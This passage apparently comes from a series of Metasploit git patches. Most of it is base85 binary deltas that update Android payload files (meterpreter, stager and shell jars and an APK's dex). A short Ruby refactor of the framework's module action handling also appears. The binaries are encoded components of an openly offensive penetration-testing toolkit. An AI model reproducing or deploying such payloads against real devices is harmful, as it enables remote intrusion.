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

diff --git a/data/android/metstage.jar b/data/android/metstage.jar
index 65fe7a7cf271b2e3cc81268cf3e6592bb0320211..84f1e464710d468539db001c2f58fe9f860acd3c 100644
GIT binary patch
delta 45
scmdnZx0{bQz?+#xgn<JH|7QN4$lJ*bq&Ci!WCPKYx3W2d>ECP)0A9Zl=l}o!

delta 45
scmdnZx0{bQz?+#xgn<JH6;xkL<n3ezQX6MVvVrKyTiKk!^lvr?00t`!7ytkO

diff --git a/data/android/shell.jar b/data/android/shell.jar
index 13cfe6cecf81e175434e2d0786416ed3aea24c11..459491b3d1308b22e97e1270e302ed8829c1d96c 100644
GIT binary patch
delta 45
scmdnXx0jDMz?+#xgn<JH|78B2$lJ*bq&Ci!W&_cax3f8e>A!3a0AFMg?f?J)

delta 45
scmdnXx0jDMz?+#xgn<JH6;xkL<n3ezQX6MVvw`Tz+u5AK^j|gy00$clA^-pY


From 96945442ffb78370253c8c4f233b6f6dcfd1ca7f Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Sun, 27 Jul 2014 18:20:12 -0500
Subject: [PATCH 172/321] removes unnec. retruns & uses of 'not' -
 has_actions.rb

---
 lib/msf/core/module/has_actions.rb | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/module/has_actions.rb b/lib/msf/core/module/has_actions.rb
index dc7fd32c81..d65fb6722e 100644
--- a/lib/msf/core/module/has_actions.rb
+++ b/lib/msf/core/module/has_actions.rb
@@ -16,25 +16,23 @@ module Msf::Module::HasActions
 
   def action
     sa = datastore['ACTION']
-    return find_action(default_action) if not sa
-    return find_action(sa)
+    sa ? find_action(sa) : find_action(default_action)
   end
 
   def find_action(name)
-    return nil if not name
-    actions.each do |a|
-      return a if a.name == name
+    if name
+      actions.each do |a|
+        return a if a.name == name
+      end
     end
-    return nil
   end
 
   #
   # Returns a boolean indicating whether this module should be run passively
   #
   def passive?
-    act = action()
-    return passive_action?(act.name) if act
-    return self.passive
+    act = action
+    act ? passive_action?(act.name) : self.passive
   end
 
   #

From 2b46e76e85c24a56a29f19b0322f8de1f570129f Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sun, 27 Jul 2014 22:23:26 -0700
Subject: [PATCH 173/321] Recompiled again.

---
 data/android/apk/classes.dex    | Bin 10020 -> 10040 bytes
 data/android/apk/resources.arsc | Bin 580 -> 584 bytes
 data/android/meterpreter.jar    | Bin 41691 -> 41691 bytes
 data/android/metstage.jar       | Bin 1851 -> 1851 bytes
 data/android/shell.jar          | Bin 1853 -> 1853 bytes
 5 files changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex
index 7645402831c3882fe19b5b5a1b4bc3f1d9195b23..ff39e87f11448e4c3543e9611c6a19b1d18aa857 100644
GIT binary patch
delta 4562
zcmai&dvp}l9mjun9y|M(-E4L@+3aRFyV=c#BxFt4@W`7WD3p*0o}d^45=_*ft^p!o
z)o!d-QK4c7F}COdD+eoDpgfA87JNYwMSOCo)?l%%p3|yrRjQua@4Y+09Q#Kn=QH2m
z@7~{i%ze#dA8p^)Ufk2W%3fVFfx4m}@6X$)9hmg|uXdi9bolc<wZjc(&z6U4?<@A!
